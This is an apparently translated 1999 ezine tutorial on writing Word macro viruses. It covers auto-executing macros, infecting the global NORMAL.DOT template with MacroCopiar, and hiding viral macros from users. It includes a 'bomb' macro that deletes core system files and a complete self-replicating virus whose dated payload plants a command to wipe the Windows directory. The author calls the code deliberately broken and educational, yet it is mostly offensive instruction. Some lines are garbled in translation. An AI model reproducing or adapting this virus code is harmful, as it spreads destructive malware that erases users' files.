This article was originally published NetSearch Ezine number #1 , in 1999.
The code this presentation does not work intentionally (the code is altered so it can not be executed), and only would affect Word 7.0
The objective of the article was to demonstrate a vulnerability in the software.
The so-called macro virus or macro Trojans are viruses encoded in applications like Word or Excel, using these macros to automate certain tasks.
This kind of malware is really easy to create and extend, but if you are really interested in the world of viruses, you should learn to write assembler.
They are written in an scripted language used by the application, typically Visual Basic for Applications (VBA) or, in the case of Word, Word Basic (WB). Both languages are very similar (actually VB is a version of Visual Basic specifically for this application), but is not the subject of this article to learn programming in these languages, but some viral techniques for these languages.
Being the most common, I will focus on Word viruses, although the mechanism is the same for all applications.
Word Basic is an interpreted language, pretty simple, and is unique in that its instructions are in the same language as the Word itself. Thus, if we encode a virus for Word in spanish, and it's ran in an English Word will give an error message. If you're a bit clever, you should be able to solve this problem to make a multilingual virus. Anyway, there are many commands that are not language dependant, so a good goal would be to write a virus using only such commands.
Macros in Word are in the templates (*. Dot). When you create a new document, it is normal that this document is opened by default with the global template NORMAL.DOT, but can be opened with a different template if desired. These templates inherit the format in which the document is started.
To create a document that contains macros, you just have to create a document, and save as a template (.dot), not as a document (.doc). Once done, the document may already contain macros. Keep in mind that you can rename the file, and transform it back to .DOC, preserving the properties and template that contains macros. Also you could create a new document based on a template infected, but this case, in my opinion, is not the most appropriate, since its already dependant on another file.
There are 5 automatic macros, which are basic (well, that's not really true) for creating virus (although not "bomb documents"), since the ultimate goal of a virus is to reproduce. These macros are:
AutoExec: A macro with this name will be executed each time the Word is started.
AutoOpen: Se ejecuta cada vez que se abre el documento.
AutoClose: It runs every time the document is opened.
AutoNew: It runs whenever a new document is created.
AutoExit: It runs when you quit Word.
It goes without saying that these automatic macros are called the same in all versions of Word.
As expected, if a global template (NORMAL.DOT) contains an automatic macro, all documents opened with that template will launch the execution of these macros. This is one of the most important things to consider writing macro viruses.
A virus can use several mechanisms to infect. One is the use of function MacroCopiar:
MacroCopiar PlantillaOrigen:MacroOrigen , PlantillaDestino:MacroDestino , OnlyExecutable
where OnlyExecutable is a number; if not 0, causes the macro to be copied as only executable, and therefore can not be edited and view contents.
The infection process is simple. The infected document brings macros written in their code. Using this command, you can copy the macros from the global template, thus infecting the Word.
MacroCopiar “MiVirus:infecto” , “Global:AutoOpen” ,1
This copies the "infecto" Global macro MiVirus.DOC (NORMAL.DOT) as AutoOpen and execution mode only. From that moment, all documents using that template, when opened will provoke the execution of the macro.
In Word there are two ways to access a menu where you can view, edit or delete macros from a document:
Through the menu Tools / Macros ..., where you can edit (if not only-executable), and delete.
Within this dialog there is a button (Organizer ...) showing us another box where you can copy macros from one document to another, or delete.
The other way is via File / Templates ... where is also accessible the Organizer.
There are many ways to hide it, and thus prevent access to our viral macros. We could disable these menus, delete them, even emulate ...
Bombs can also be made in several ways. One is to create a macro in a document, and assign a hotkey to execution.
Sub MAIN FijarAtributos "c:\autoexec bat" ,0 FijarAtributos "c:\command com",0 FijarAtributos "c:\config sys",0 Kill c:\autoexec bat" Kill "c:\command com" Kill "c:\config sys" End Sub
This short code, removes all attributes autoexec.bat, config.sys and command.com (the "0" is the one that indicates it). After that the files are deleted with the Kill instruction.
If we make a macro with this, and we assign as execution key, for example, "left", pressing this key will erase the files.
Finally, here is a small example of simple VBA viruses to understand all of the above. We have an infected document, called pezqueñin.doc containing the following AutoOpen macro call:
Sub MAIN MacroCopiar NombreVentana$() + ":infeccion" , "Global:AutoOpen" , 1 // Copy the macro infection // to the global template with // the name AutoOpen and only-execution mode MacroCopiar NombreVentana$() + ":AutoOpen" , "Global:infectado" , 1 // Copies AutoOpen macro // from infected document to the global End Sub
and another macro infección
Sub MAIN On Error Resume Next ArchivoGuardarComo .Formato = 1 MacroCopiar "Global:AutoOpen" , NombreVentana$() + ":infeccion" , 1 MacroCopiar "Global:infectado" , NombreVentana$() + ":AutoOpen" , 1 ArchivoGuardar If Dia(Ahora()) = 28 Then If Mes(Ahora()) = 4 Then MsgBox "Acaba de ser infectado por el virus Pezqueñin", "Virus msg", 0 Open "c:\autoexec.bat" For Append As #1 Print #1 " del c\windows\*.* > null " Close #1 SalirWindows End If End If End sub
This article was written for pure educational purposes, to know a little more what a computer can do, and to know the faults that need to be solved.